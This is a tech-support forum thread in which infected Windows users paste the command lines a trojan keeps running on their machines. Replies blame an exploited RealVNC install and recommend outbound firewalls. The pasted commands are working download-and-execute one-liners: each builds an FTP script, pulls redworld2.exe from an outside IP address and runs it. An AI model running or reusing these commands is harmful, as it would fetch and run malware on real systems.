Yesterday my cmd window would pop up and start scrolling commands. This isn't something I instructed, so something's wrong. Following are the commands that would scroll:
cmd.exe /c echo open 211.193.89.63 21182>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s
cmd.exe /c echo open 211.193.89.104 27639>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit
cmd.exe /c echo open 211.193.132.111 22714>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit
cmd.exe /c echo open 211.193.217.35 29625>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit
cmd.exe /c echo open 211.193.186.26 3452>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit
cmd.exe /c echo open 211.193.89.104 29311>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit
cmd.exe /c echo open 211.193.89.63 13632>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit
cmd.exe /c echo open 211.193.22.122 14745>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit

Here are the results of my 1st HT log:

Hi, I am also facing the same issue. When ever I try browsing for any Anti Virus software or Firewall in IE or Firefox the browser is crashing. Some times I am getting a pop up ODBC installer :Odbc cannot load the resource \WINNT\System32\dllcache If I click OK then all the applications are getting closed. Most of the times, its typing the following command in the Run.Also this message appears in other windows as well when I am working on notepad or chat windows. cmd /c echo OPEN 81.224.122.148 17379>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit I tried to remove the spyware through Ad-ware,spybot but there is no use. Experts please help me in getting rid of this problem. Thanks, PBV

Welcome to the forum :wavey:

I found a site that said this problem was due to a trojan taking control of "RealVNC".

Do you have the latest version, or is that something you can live wihout?

I am not sure what RealVNC is - I don't think I'd miss it if I removed it. The "Add / Remove Programs" list shows that I rarely use it. By way of update, I discovered that I did not have the Windows firewall enabled. I am connected to a hotel network for internet access, so I suspect there is someone on the network with this trojan. Now that I have the firewall enabled I do not see this problem. In any event, I think I'll remove the RealVNC program altogether.

You need another firewall to replace Windows firewall.

The Windows firewall does nothing to alert you if something on the inside is communicating outbound.

Free firewalls can be found here:
